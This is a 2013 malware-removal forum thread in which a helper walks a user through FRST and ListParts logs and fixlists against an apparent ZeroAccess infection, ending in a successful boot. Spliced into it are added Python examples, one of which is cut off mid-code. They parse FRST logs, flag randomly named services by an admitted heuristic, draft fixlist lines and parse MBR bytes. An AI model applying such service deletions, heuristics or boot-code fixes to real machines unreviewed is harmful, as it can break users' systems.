    C:\Users\Fabian Zayas\AppData\Local\Temp\Bonjour64Setup.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\bpuninstall.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\burnsetup.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\default_pack_installer.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\emhumjj-.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\ffmpeg15.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\FlashPlayer.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\intrau3.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\oyhilrl7.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\tspohk6x.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\uninst.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\vpsetup.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp\wctikeq3.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\xtj1ygy9.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\zfqyfyh4.dll
    C:\Users\Fabian Zayas\AppData\Local\Temp\zipsetup.exe


    ==================== Known DLLs (Whitelisted) ================


    ==================== Bamital & volsnap Check =================

    C:\Windows\System32\winlogon.exe => MD5 is legit
    C:\Windows\System32\wininit.exe => MD5 is legit
    C:\Windows\SysWOW64\wininit.exe => MD5 is legit
    C:\Windows\explorer.exe => MD5 is legit
    C:\Windows\SysWOW64\explorer.exe => MD5 is legit
    C:\Windows\System32\svchost.exe => MD5 is legit
    C:\Windows\SysWOW64\svchost.exe => MD5 is legit
    C:\Windows\System32\services.exe => MD5 is legit
    C:\Windows\System32\User32.dll => MD5 is legit
    C:\Windows\SysWOW64\User32.dll => MD5 is legit
    C:\Windows\System32\userinit.exe => MD5 is legit
    C:\Windows\SysWOW64\userinit.exe => MD5 is legit
    C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit
    ATTENTION: ====> ZeroAccess. Use DeleteJunctionsIndirectory: C:\Windows\system64

    ==================== EXE ASSOCIATION =====================

    HKLM\...\.exe: exefile => OK
    HKLM\...\exefile\DefaultIcon: %1 => OK
    HKLM\...\exefile\open\command: "%1" %* => OK

    ==================== Restore Points =========================

    19
    Restore point made on: 2013-10-28 23:00:15
    Restore point made on: 2013-10-29 23:00:15
    Restore point made on: 2013-10-30 23:00:14
    Restore point made on: 2013-10-31 23:00:15
    Restore point made on: 2013-11-01 23:00:24
    Restore point made on: 2013-11-02 23:00:20
    Restore point made on: 2013-11-03 00:00:16
    Restore point made on: 2013-11-08 06:53:45
    Restore point made on: 2013-11-09 00:00:26
    Restore point made on: 2013-11-10 00:00:15
    Restore point made on: 2013-11-11 00:00:14
    Restore point made on: 2013-11-12 00:00:15
    Restore point made on: 2013-11-13 00:00:15
    Restore point made on: 2013-11-14 00:00:15
    Restore point made on: 2013-11-15 00:00:15
    Restore point made on: 2013-11-16 00:00:15
    Restore point made on: 2013-11-17 00:00:15
    Restore point made on: 2013-11-18 00:00:15
    Restore point made on: 2013-11-19 00:00:14

    ==================== Memory info ===========================

    Percentage of memory in use: 19%
    Total physical RAM: 3966.49 MB
    Available physical RAM: 3197.69 MB
    Total Pagefile: 3964.69 MB
    Available Pagefile: 3217.93 MB
    Total Virtual: 8192 MB
    Available Virtual: 8191.87 MB

    ==================== Drives ================================

    Drive c: (HP) (Fixed) (Total:453.72 GB) (Free:244.97 GB) NTFS
    Drive e: (FACTORY_IMAGE) (Fixed) (Total:11.94 GB) (Free:2.17 GB) NTFS ==>[System with boot components (obtained from reading drive)]
    Drive f: (Repair disc Windows 7 64-bit) (CDROM) (Total:0.24 GB) (Free:0 GB) UDF
    Drive k: () (Removable) (Total:7.45 GB) (Free:0.99 GB) FAT32
    Drive x: (Boot) (Fixed) (Total:0.03 GB) (Free:0.03 GB) NTFS
    Drive y: (SYSTEM) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS ==>[System with boot components (obtained from reading drive)]

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (Size: 466 GB) (Disk ID: 1549F232)
    Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
    Partition 2: (Not Active) - (Size=454 GB) - (Type=07 NTFS)
    Partition 4: (Not Active) - (Size=12 GB) - (Type=07 NTFS)

    ========================================================
    Disk: 5 (Size: 7 GB) (Disk ID: 00000000)
    Partition 1: (Not Active) - (Size=7 GB) - (Type=0B)


    LastRegBack: 2013-11-09 21:03

    ==================== End Of Log ============================
     
  6. TwinHeadedEagle

    TwinHeadedEagle Removal Expert
    Staff Member

    Mar 8, 2013
    21,434
    2,634
    Malware Removal, Gaming
    Windows 7
    ESET
    On your clean PC, download the following file by right-clicking it and selecting Save As

    [attachment=6406]

    and save it onto your flash drive.

    Then, boot to system recovery, plug in your flash drive, open FRST and click fix. Post the generated log.

    Attempt to boot normally.
     


  7. Mr.LucianoSno

    Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 18-11-2013
    Ran by SYSTEM at 2013-12-01 19:19:07 Run:3
    Running from G:\
    Boot Mode: Recovery
    ==============================================

    Content of fixlist:
    *****************
    S1 eqcpqxgh; \??\C:\Windows\system32\drivers\eqcpqxgh.sys [x]
    S3 PCDSRVC{F36B3A4C-F95654BD-06000000}_0; \??\c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms [x]
    S1 rgqxleuo; \??\C:\Windows\system32\drivers\rgqxleuo.sys [x]
    C:\$Recycle.Bin\S-1-5-20\$7f423d6bb8301d0cfc6ddd327d766fda
    C:\Windows\svchost.exe
    C:\ProgramData\0949343.pad
    C:\ProgramData\4v7x6c2B2.dat
    C:\Users\Fabian Zayas\audacity-win-1.2.6.exe
    C:\Users\Fabian Zayas\switchsetup.exe
    C:\Users\Fabian Zayas\utorrent.exe
    C:\Users\Fabian Zayas\AppData\Local\Temp
    *****************

    eqcpqxgh => Service deleted successfully.
    PCDSRVC{F36B3A4C-F95654BD-06000000}_0 => Service deleted successfully.
    rgqxleuo => Service deleted successfully.
    "C:\$Recycle.Bin\S-1-5-20\$7f423d6bb8301d0cfc6ddd327d766fda" => File/Directory not found.
    "C:\Windows\svchost.exe" => File/Directory not found.
    "C:\ProgramData\0949343.pad" => File/Directory not found.
    "C:\ProgramData\4v7x6c2B2.dat" => File/Directory not found.
    "C:\Users\Fabian Zayas\audacity-win-1.2.6.exe" => File/Directory not found.
    "C:\Users\Fabian Zayas\switchsetup.exe" => File/Directory not found.
    "C:\Users\Fabian Zayas\utorrent.exe" => File/Directory not found.
    "C:\Users\Fabian Zayas\AppData\Local\Temp" => File/Directory not found.

    ==== End of Fixlog ====

    Attempted to boot normally and got the same result.
     
  8. TwinHeadedEagle

    I need a fresh FRST report; you attached the first report you created...

    Boot to recovery, open FRST, press Scan and attach that report...
     
  9. Mr.LucianoSno

    Sorry, I did as you directed. Here is the Fresh FRST report.

    Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 18-11-2013
    Ran by SYSTEM on MININT-9IATATT on 02-12-2013 02:41:49
    Running from K:\
    Windows 7 Home Premium Service Pack 1 (X64) OS Language: English(US)
    Internet Explorer Version 9
    Boot Mode: Recovery

    The current controlset is ControlSet001
    ATTENTION!:=====> If the system is bootable FRST could be run from normal or Safe mode to create a complete log.

    ==================== Registry (Whitelisted) ==================

    HKLM\...\Run: [NvCplDaemon] - RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
    HKLM\...\Run: [MSC] - C:\Program Files\Microsoft Security Client\msseces.exe [1356240 2013-08-12] (Microsoft Corporation)
    HKLM\...\Run: [MRT] - C:\Windows\System32\MRT.exe [80541720 2013-10-26] (Microsoft Corporation)
    HKLM\...\RunOnce: [*WerKernelReporting] - %SYSTEMROOT%\SYSTEM32\WerFault.exe -k -rq [415232 2009-07-13] (Microsoft Corporation)
    HKLM\...\RunOnce: [*Restore] - C:\Windows\system32\rstrui.exe /RUNONCE [296960 2009-07-13] (Microsoft Corporation)
    HKLM\...\Policies\Explorer: [HideSCAHealth] 1
    HKLM-x32\...\Run: [] - [x]
    HKU\Default\...\Run: [HPADVISOR] - [x]
    HKU\Default User\...\Run: [HPADVISOR] - [x]
    HKU\Fabian Zayas\...\Run: [Google Update] - C:\Users\Fabian Zayas\AppData\Local\Google\Update\GoogleUpdate.exe [136176 2012-02-03] (Google Inc.)
    SSODL: EldosMountNotificator - {C28617FD-4FE7-4043-AD51-C8132CE90106} - C:\Windows\system32\SSCbFsMntNtf3.dll (EldoS Corporation)
    SSODL-x32: EldosMountNotificator - {C28617FD-4FE7-4043-AD51-C8132CE90106} - No File

    ==================== Services (Whitelisted) =================

    S2 DigiRefresh; C:\Program Files (x86)\Digidesign\Drivers\MMERefresh.exe [77824 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    S3 digiSPTIService; C:\Program Files (x86)\Digidesign\Pro Tools\digiSPTIService.exe [159744 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    S2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe [398184 2012-12-14] (Malwarebytes Corporation)
    S2 MBAMService; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [682344 2012-12-14] (Malwarebytes Corporation)
    S2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23808 2013-08-12] (Microsoft Corporation)
    S3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [366600 2013-08-12] (Microsoft Corporation)
    S2 USBMIDIAudioDevMon; C:\Program Files (x86)\M-Audio\USB MIDI Series\AudioDevMon.exe [1636872 2010-04-13] (M-Audio)
    S2 WSWNA3100; C:\Program Files (x86)\NETGEAR\WNA3100\WifiSvc.exe [303360 2011-12-07] ()

    ==================== Drivers (Whitelisted) ====================

    S3 gbridge; C:\Windows\System32\DRIVERS\gbridge64.sys [48192 2009-10-12] (Gbridge LLC)
    S3 KORGUMDS; C:\Windows\System32\Drivers\KORGUM64.SYS [31832 2010-01-07] (KORG INC.)
    S3 MAUSBMIDI; C:\Windows\System32\DRIVERS\MAudioUSBMIDI.sys [200200 2010-04-13] (M-Audio)
    S3 MBAMProtector; C:\Windows\system32\drivers\Malwarebytes Anti-Malware.sys [24176 2012-12-14] (Malwarebytes Corporation)
    S3 MBX2DFU; C:\Windows\System32\DRIVERS\MBX2DFU.sys [31120 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    S3 MBX2MIDK; C:\Windows\System32\drivers\mbx2midk.sys [32400 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    S0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [247216 2013-06-18] (Microsoft Corporation)
    S1 MpKsl24c7195b; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B14D72D4-AEC5-4005-BC79-2307C0E89114}\MpKsl24c7195b.sys [46768 2013-10-26] (Microsoft Corporation)
    S1 MpKsl71c12e8c; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B14D72D4-AEC5-4005-BC79-2307C0E89114}\MpKsl71c12e8c.sys [46768 2013-11-08] (Microsoft Corporation)
    S1 MpKsl7de8a784; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B14D72D4-AEC5-4005-BC79-2307C0E89114}\MpKsl7de8a784.sys [46768 2013-11-08] (Microsoft Corporation)
    S1 MpKsl81550350; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B14D72D4-AEC5-4005-BC79-2307C0E89114}\MpKsl81550350.sys [46768 2013-11-01] (Microsoft Corporation)
    S2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [139616 2013-06-18] (Microsoft Corporation)
    S3 NPF; C:\Windows\System32\DRIVERS\npf.sys [47632 2010-02-03] (CACE Technologies, Inc.)
    S3 SSCBFS3; C:\Windows\System32\DRIVERS\sscbfs3.sys [347904 2013-01-30] (EldoS Corporation)
    S4 eqcpqxgh;
    S4 PCDSRVC{F36B3A4C-F95654BD-06000000}_0;
    S4 rgqxleuo;

    ==================== NetSvcs (Whitelisted) ===================


    ==================== One Month Created Files and Folders ========

    2013-11-21 01:07 - 2013-11-21 01:07 - 00000000 ____D C:\FRST
    2013-11-19 20:00 - 2013-11-19 20:00 - 00445859 _____ C:\Users\Fabian Zayas\Downloads\Unconfirmed 89245.crdownload
    2013-11-19 20:00 - 2013-11-19 20:00 - 00000920 _____ C:\Users\Fabian Zayas\Desktop\Rkill.txt
    2013-11-19 19:58 - 2013-11-19 19:58 - 00000000 ____D C:\TDSSKiller_Quarantine
    2013-11-19 19:41 - 2013-11-19 19:41 - 00000000 ____D C:\Windows\System32\MpEngineStore
    2013-11-08 06:51 - 2013-11-08 06:51 - 00292576 _____ C:\Windows\Minidump\110813-25662-01.dmp

    ==================== One Month Modified Files and Folders =======

    2013-12-01 19:08 - 2010-01-19 21:39 - 00000000 ____D C:\users\Fabian Zayas
    2013-11-21 01:07 - 2013-11-21 01:07 - 00000000 ____D C:\FRST
    2013-11-21 00:13 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\registration
    2013-11-19 20:00 - 2013-11-19 20:00 - 00445859 _____ C:\Users\Fabian Zayas\Downloads\Unconfirmed 89245.crdownload
    2013-11-19 20:00 - 2013-11-19 20:00 - 00000920 _____ C:\Users\Fabian Zayas\Desktop\Rkill.txt
    2013-11-19 19:58 - 2013-11-19 19:58 - 00000000 ____D C:\TDSSKiller_Quarantine
    2013-11-19 19:41 - 2013-11-19 19:41 - 00000000 ____D C:\Windows\System32\MpEngineStore
    2013-11-18 00:00 - 2009-10-31 01:17 - 01296133 _____ C:\Windows\WindowsUpdate.log
    2013-11-17 23:58 - 2012-02-03 07:03 - 00000936 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1262836980-3029127208-1620874908-1000UA.job
    2013-11-17 23:52 - 2013-03-06 22:38 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
    2013-11-17 23:40 - 2011-02-15 19:09 - 00000910 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
    2013-11-17 22:40 - 2011-02-15 19:09 - 00000906 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
    2013-11-17 20:58 - 2012-02-03 07:03 - 00000884 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1262836980-3029127208-1620874908-1000Core.job
    2013-11-17 19:02 - 2013-10-21 16:36 - 00000362 _____ C:\Windows\Tasks\HPCeeScheduleForFabian Zayas.job
    2013-11-08 07:00 - 2009-07-13 20:45 - 00015792 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
    2013-11-08 07:00 - 2009-07-13 20:45 - 00015792 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
    2013-11-08 06:58 - 2009-07-13 21:13 - 00726444 _____ C:\Windows\System32\PerfStringBackup.INI
    2013-11-08 06:51 - 2013-11-08 06:51 - 00292576 _____ C:\Windows\Minidump\110813-25662-01.dmp
    2013-11-08 06:51 - 2010-01-29 07:38 - 410054500 _____ C:\Windows\MEMORY.DMP
    2013-11-08 06:51 - 2010-01-29 07:38 - 00000000 ____D C:\Windows\Minidump
    2013-11-08 06:51 - 2009-07-13 21:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
    2013-11-08 06:51 - 2009-07-13 20:51 - 00191847 _____ C:\Windows\setupact.log

    ==================== Known DLLs (Whitelisted) ================


    ==================== Bamital & volsnap Check =================

    C:\Windows\System32\winlogon.exe => MD5 is legit
    C:\Windows\System32\wininit.exe => MD5 is legit
    C:\Windows\SysWOW64\wininit.exe => MD5 is legit
    C:\Windows\explorer.exe => MD5 is legit
    C:\Windows\SysWOW64\explorer.exe => MD5 is legit
    C:\Windows\System32\svchost.exe => MD5 is legit
    C:\Windows\SysWOW64\svchost.exe => MD5 is legit
    C:\Windows\System32\services.exe => MD5 is legit
    C:\Windows\System32\User32.dll => MD5 is legit
    C:\Windows\SysWOW64\User32.dll => MD5 is legit
    C:\Windows\System32\userinit.exe => MD5 is legit
    C:\Windows\SysWOW64\userinit.exe => MD5 is legit
    C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit
    ATTENTION: ====> ZeroAccess. Use DeleteJunctionsIndirectory: C:\Windows\system64

    ==================== EXE ASSOCIATION =====================

    HKLM\...\.exe: exefile => OK
    HKLM\...\exefile\DefaultIcon: %1 => OK
    HKLM\...\exefile\open\command: "%1" %* => OK

    ==================== Restore Points =========================

    19
    Restore point made on: 2013-10-28 23:00:15
    Restore point made on: 2013-10-29 23:00:15
    Restore point made on: 2013-10-30 23:00:14
    Restore point made on: 2013-10-31 23:00:15
    Restore point made on: 2013-11-01 23:00:24
    Restore point made on: 2013-11-02 23:00:20
    Restore point made on: 2013-11-03 00:00:16
    Restore point made on: 2013-11-08 06:53:45
    Restore point made on: 2013-11-09 00:00:26
    Restore point made on: 2013-11-10 00:00:15
    Restore point made on: 2013-11-11 00:00:14
    Restore point made on: 2013-11-12 00:00:15
    Restore point made on: 2013-11-13 00:00:15
    Restore point made on: 2013-11-14 00:00:15
    Restore point made on: 2013-11-15 00:00:15
    Restore point made on: 2013-11-16 00:00:15
    Restore point made on: 2013-11-17 00:00:15
    Restore point made on: 2013-11-18 00:00:15
    Restore point made on: 2013-11-19 00:00:14

    ==================== Memory info ===========================

    Percentage of memory in use: 19%
    Total physical RAM: 3966.49 MB
    Available physical RAM: 3212.71 MB
    Total Pagefile: 3964.69 MB
    Available Pagefile: 3198.88 MB
    Total Virtual: 8192 MB
    Available Virtual: 8191.88 MB

    ==================== Drives ================================

    Drive c: (HP) (Fixed) (Total:453.72 GB) (Free:244.97 GB) NTFS
    Drive e: (FACTORY_IMAGE) (Fixed) (Total:11.94 GB) (Free:2.17 GB) NTFS ==>[System with boot components (obtained from reading drive)]
    Drive f: (Repair disc Windows 7 64-bit) (CDROM) (Total:0.24 GB) (Free:0 GB) UDF
    Drive k: () (Removable) (Total:7.45 GB) (Free:0.99 GB) FAT32
    Drive x: (Boot) (Fixed) (Total:0.03 GB) (Free:0.03 GB) NTFS
    Drive y: (SYSTEM) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS ==>[System with boot components (obtained from reading drive)]

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (Size: 466 GB) (Disk ID: 1549F232)
    Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
    Partition 2: (Not Active) - (Size=454 GB) - (Type=07 NTFS)
    Partition 4: (Not Active) - (Size=12 GB) - (Type=07 NTFS)

    ========================================================
    Disk: 5 (Size: 7 GB) (Disk ID: 00000000)
    Partition 1: (Not Active) - (Size=7 GB) - (Type=0B)


    LastRegBack: 2013-11-09 21:03

    ==================== End Of Log ============================
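The report above carries the three things a helper looks for first: service entries whose image path FRST could not find (the `[x]` marker, or no path at all), driver services with randomly generated eight-letter names, and FRST's own `ATTENTION:` line naming ZeroAccess and the directive to use against it. The Python below is an added example written for this thread; it is not part of FRST, and the sample log embedded in it is constructed from lines that appear in the posts above. It parses those entries out of a pasted FRST log and drafts the matching fixlist lines the way the fixes in this thread do (a service line pasted verbatim into fixlist.txt makes FRST delete that service; the `DeleteJunctionsIndirectory:` line is copied from FRST's own suggestion). The eight-lowercase-letter heuristic for random names is an assumption based on the two names seen here, not an FRST or ZeroAccess signature, and the drafted fixlist is for a human to review, not to apply blindly.

```python
"""Triage a pasted FRST (Farbar Recovery Scan Tool) log and draft fixlist lines.

Added example for this thread; not part of FRST. The sample log below is
constructed from lines that appear in the thread.
"""
import re
from dataclasses import dataclass
from typing import List

# Constructed sample: a handful of lines in the shape FRST prints them.
SAMPLE_LOG = r"""
Boot Mode: Recovery
ATTENTION!:=====> If the system is bootable FRST could be run from normal or Safe mode to create a complete log.

==================== Services (Whitelisted) =================

S2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23808 2013-08-12] (Microsoft Corporation)
S2 WSWNA3100; C:\Program Files (x86)\NETGEAR\WNA3100\WifiSvc.exe [303360 2011-12-07] ()

==================== Drivers (Whitelisted) ====================

S3 gbridge; C:\Windows\System32\DRIVERS\gbridge64.sys [48192 2009-10-12] (Gbridge LLC)
S0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [247216 2013-06-18] (Microsoft Corporation)
S3 KORGUMDS; C:\Windows\System32\Drivers\KORGUM64.SYS [31832 2010-01-07] (KORG INC.)
S1 eqcpqxgh; \??\C:\Windows\system32\drivers\eqcpqxgh.sys [x]
S3 PCDSRVC{F36B3A4C-F95654BD-06000000}_0; \??\c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms [x]
S4 rgqxleuo;

==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
ATTENTION: ====> ZeroAccess. Use DeleteJunctionsIndirectory: C:\Windows\system64
"""

# "S1 name; path [size date] (company)": start type, name, then whatever FRST printed.
SERVICE_RE = re.compile(r'^(?P<start>[SR]\d) (?P<name>[^;]+);\s*(?P<rest>.*)$')
ZA_RE = re.compile(r'ZeroAccess\. Use (DeleteJunctionsIndirectory: .+)$')
VOWELS = set('aeiou')


@dataclass
class ServiceEntry:
    start: str     # S0..S4 / R2 etc., as FRST prints it
    name: str
    path: str      # '' when FRST printed no path at all
    missing: bool  # FRST's [x] marker (file not found) or no path
    raw: str       # the line exactly as logged; pasting it into fixlist.txt deletes the service


def parse_services(log: str) -> List[ServiceEntry]:
    entries = []
    for line in log.splitlines():
        line = line.strip()
        m = SERVICE_RE.match(line)
        if not m:
            continue
        rest = m.group('rest').strip()
        if rest.endswith('[x]'):
            path, missing = rest[:-3].strip(), True
        else:
            path, missing = rest.split(' [')[0], rest == ''
        entries.append(ServiceEntry(m.group('start'), m.group('name'), path, missing, line))
    return entries


def looks_random(name: str) -> bool:
    """Heuristic (assumption, not a signature): eight lowercase letters with a
    run of four or more consonants, the shape of the two names in this thread."""
    if not re.fullmatch(r'[a-z]{8}', name):
        return False
    run = longest = 0
    for ch in name:
        run = 0 if ch in VOWELS else run + 1
        longest = max(longest, run)
    return longest >= 4


def find_attention(log: str) -> List[str]:
    """FRST's own findings; the 'ATTENTION!:' boot-mode note is not one of them."""
    return [l.strip() for l in log.splitlines() if l.strip().startswith('ATTENTION: ')]


def build_fixlist(entries: List[ServiceEntry], attention: List[str]) -> List[str]:
    """Draft fixlist.txt lines for a human to review; never apply unreviewed."""
    lines = [e.raw for e in entries if e.missing]
    for note in attention:
        m = ZA_RE.search(note)
        if m:
            lines.append(m.group(1))   # FRST's suggested directive, copied from its log
    return lines


def triage(log: str) -> dict:
    entries = parse_services(log)
    attention = find_attention(log)
    return {
        'orphaned': [e.name for e in entries if e.missing],
        'suspicious': [e.name for e in entries if looks_random(e.name)],
        'attention': attention,
        'fixlist': build_fixlist(entries, attention),
    }


if __name__ == '__main__':
    for key, value in triage(SAMPLE_LOG).items():
        print(key)
        for item in value:
            print('   ', item)
```

Run on the sample, `orphaned` lists all three path-less services, but `suspicious` lists only the two eight-letter names: the PC-Doctor entry is an orphan too (its file is gone) and is worth cleaning up, yet it does not carry the random-name pattern, which is the distinction a reviewer wants before deciding what is malware residue and what is an uninstalled vendor tool. The `\??\` prefix on those paths is the NT object-manager form of a drive path and appears on legitimate drivers as well, so the script does not key on it.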
     
  10. TwinHeadedEagle

    Download ListParts64.exe from link below, and save it to your USB.

    http://www.bleepingcomputer.com/download/listparts/dl/78/

    Go to recovery, run it, click on Scan, and attach the report.
     
  11. Mr.LucianoSno

    Here is the report.

    ListParts by Farbar Version: 20-10-2013
    Ran by SYSTEM (administrator) on 02-12-2013 at 03:31:21
    Windows 7 (X64)
    Running From: K:\
    Language: 0409
    ************************************************************

    ========================= Memory info ======================

    Percentage of memory in use: 15%
    Total physical RAM: 3966.49 MB
    Available physical RAM: 3346.18 MB
    Total Pagefile: 3964.69 MB
    Available Pagefile: 3337.14 MB
    Total Virtual: 8192 MB
    Available Virtual: 8191.91 MB

    ======================= Partitions =========================

    1 Drive c: (HP) (Fixed) (Total:453.72 GB) (Free:244.97 GB) NTFS
    2 Drive e: (FACTORY_IMAGE) (Fixed) (Total:11.94 GB) (Free:2.17 GB) NTFS ==>[System with boot components (obtained from reading drive)]
    3 Drive f: (Repair disc Windows 7 64-bit) (CDROM) (Total:0.24 GB) (Free:0 GB) UDF
    8 Drive k: () (Removable) (Total:7.45 GB) (Free:0.99 GB) FAT32
    9 Drive x: (Boot) (Fixed) (Total:0.03 GB) (Free:0.03 GB) NTFS
    10 Drive y: (SYSTEM) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS ==>[System with boot components (obtained from reading drive)]

    Disk ### Status Size Free Dyn Gpt
    -------- ------------- ------- ------- --- ---
    Disk 0 Online 465 GB 0 B
    Disk 1 No Media 0 B 0 B
    Disk 2 No Media 0 B 0 B
    Disk 3 No Media 0 B 0 B
    Disk 4 No Media 0 B 0 B
    Disk 5 Online 7629 MB 0 B

    Partitions of Disk 0:
    ===============

    Disk ID: 1549F232

    Partition ### Type Size Offset
    ------------- ---------------- ------- -------
    Partition 1 Primary 100 MB 1024 KB
    Partition 2 Primary 453 GB 101 MB
    Partition 3 Primary 11 GB 453 GB

    ======================================================================================================

    Disk: 0
    Partition 1
    Type : 07
    Hidden: No
    Active: Yes

    Volume ### Ltr Label Fs Type Size Status Info
    ---------- --- ----------- ----- ---------- ------- --------- --------
    * Volume 1 Y SYSTEM NTFS Partition 100 MB Healthy

    ======================================================================================================

    Disk: 0
    Partition 2
    Type : 07
    Hidden: No
    Active: No

    Volume ### Ltr Label Fs Type Size Status Info
    ---------- --- ----------- ----- ---------- ------- --------- --------
    * Volume 2 C HP NTFS Partition 453 GB Healthy

    ======================================================================================================

    Disk: 0
    Partition 3
    Type : 07
    Hidden: No
    Active: No

    Volume ### Ltr Label Fs Type Size Status Info
    ---------- --- ----------- ----- ---------- ------- --------- --------
    * Volume 3 E FACTORY_IMA NTFS Partition 11 GB Healthy

    ======================================================================================================

    Partitions of Disk 5:
    ===============

    Disk ID: 00000000

    Partition ### Type Size Offset
    ------------- ---------------- ------- -------
    Partition 1 Primary 7629 MB 16 KB

    ======================================================================================================

    Disk: 5
    Partition 1
    Type : 0B
    Hidden: No
    Active: No

    Volume ### Ltr Label Fs Type Size Status Info
    ---------- --- ----------- ----- ---------- ------- --------- --------
    * Volume 8 K FAT32 Removable 7629 MB Healthy

    ======================================================================================================
    ============================== MBR Partition Table ==================

    ==============================
    Partitions of Disk 0:
    ===============
    Disk ID: 1549F232
    Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
    Partition 2: (Not Active) - (Size=454 GB) - (Type=07 NTFS)
    Partition 4: (Not Active) - (Size=12 GB) - (Type=07 NTFS)

    ==============================
    Partitions of Disk 5:
    ===============
    Disk ID: 00000000
    Partition 1: (Not Active) - (Size=7 GB) - (Type=0B)


    ****** End Of Log ******
     
  12. TwinHeadedEagle

    Let's try another method


    On your clean PC, download the following file by right-clicking it and selecting Save As

    [attachment=6423]

    and save it onto your flash drive.

    Then, boot to system recovery, plug in your flash drive, open FRST and click fix. Post the generated log.

    Attempt to boot normally.
     


  13. Mr.LucianoSno

    I was able to boot up normally!
    Thank you for your efforts!

    Here is my fixlog.

    Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 18-11-2013
    Ran by SYSTEM at 2013-12-02 04:01:49 Run:4
    Running from K:\
    Boot Mode: Recovery
    ==============================================

    Content of fixlist:
    *****************
    HKLM\...\RunOnce: [*Restore] - C:\Windows\system32\rstrui.exe /RUNONCE [296960 2009-07-13] (Microsoft Corporation)
    HKLM-x32\...\Run: [] - [x]
    HKU\Default\...\Run: [HPADVISOR] - [x]
    HKU\Default User\...\Run: [HPADVISOR] - [x]
    cmd: bootrec /FixMbr
    *****************

    HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\\*Restore => Value deleted successfully.
    HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => Value deleted successfully.
    HKU\Default\Software\Microsoft\Windows\CurrentVersion\Run\\HPADVISOR => Value deleted successfully.
    HKU\Default User\Software\Microsoft\Windows\CurrentVersion\Run\\HPADVISOR => Value not found.

    ========= bootrec /FixMbr =========

    The operation completed successfully.

    ========= End of CMD: =========


    ==== End of Fixlog ====
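The fix above ends with `cmd: bootrec /FixMbr`, which rewrites the boot code in the first sector but leaves the disk signature and the four-entry partition table in place (which is why Disk 0 reads the same in every FRST and ListParts report in this thread). The Python below is an added example written for this thread, not code from FRST, ListParts or Farbar: it parses a 512-byte MBR into the lines FRST's "MBR & Partition Table" section prints and separates the byte range a boot-code rewrite replaces from the range it must preserve. The MBR it builds is constructed to resemble Disk 0 from the logs (same disk ID, slot 3 empty, sector counts that round to the sizes shown); it is not an image of the real disk, and the partition offsets and exact sector counts are assumptions. An empty slot 3 would also account for FRST numbering the last entry "Partition 4" while the diskpart-style listing in ListParts counts it as Partition 3.

```python
"""Parse a 512-byte MBR into the form FRST's 'MBR & Partition Table' section prints.

Added example for this thread; not code from FRST, ListParts or Farbar. The
MBR it builds is constructed to resemble Disk 0 in the logs, not a disk image.
"""
import struct
from dataclasses import dataclass
from typing import List, Tuple

SECTOR = 512
DISK_SIG_OFF = 0x1B8     # 4-byte NT disk signature, reported as "Disk ID"
TABLE_OFF = 0x1BE        # four 16-byte partition entries
BOOT_SIG_OFF = 0x1FE     # 0x55AA
ENTRY_FMT = '<B3sB3sII'  # status, CHS start, type, CHS end, LBA start, sector count
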